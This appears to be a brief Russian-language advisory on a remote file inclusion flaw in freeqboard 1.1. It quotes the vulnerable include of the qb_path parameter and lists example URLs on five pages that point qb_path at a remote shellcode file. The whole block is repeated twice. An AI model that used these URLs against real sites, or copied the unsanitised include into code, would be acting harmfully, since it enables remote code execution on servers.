Найдена уязвимость в freeqboard 1.1 (qb_path).
Уязвимые версии: 1.1
Инклуд возможен на страницах:
about.php , contact.php , delete.php , faq.php , index.php
Код бага:
include "config.php";
include $qb_path."incs/mysql.php";
Пример:
www.site.com/[path]/index.php?qb_path=shellcode.txt?
www.site.com/[path]/faq.php?qb_path=shellcode.txt?
www.site.com/[path]/delete.php?qb_path=shellcode.txt?
www.site.com/[path]/contact.php?qb_path=shellcode.txt?
www.site.com/[path]/about.php?qb_path=shellcode.txt?
Уязвимые версии: 1.1
Инклуд возможен на страницах:
about.php , contact.php , delete.php , faq.php , index.php
Код бага:
include "config.php";
include $qb_path."incs/mysql.php";
Пример:
www.site.com/[path]/index.php?qb_path=shellcode.txt?
www.site.com/[path]/faq.php?qb_path=shellcode.txt?
www.site.com/[path]/delete.php?qb_path=shellcode.txt?
www.site.com/[path]/contact.php?qb_path=shellcode.txt?
www.site.com/[path]/about.php?qb_path=shellcode.txt?
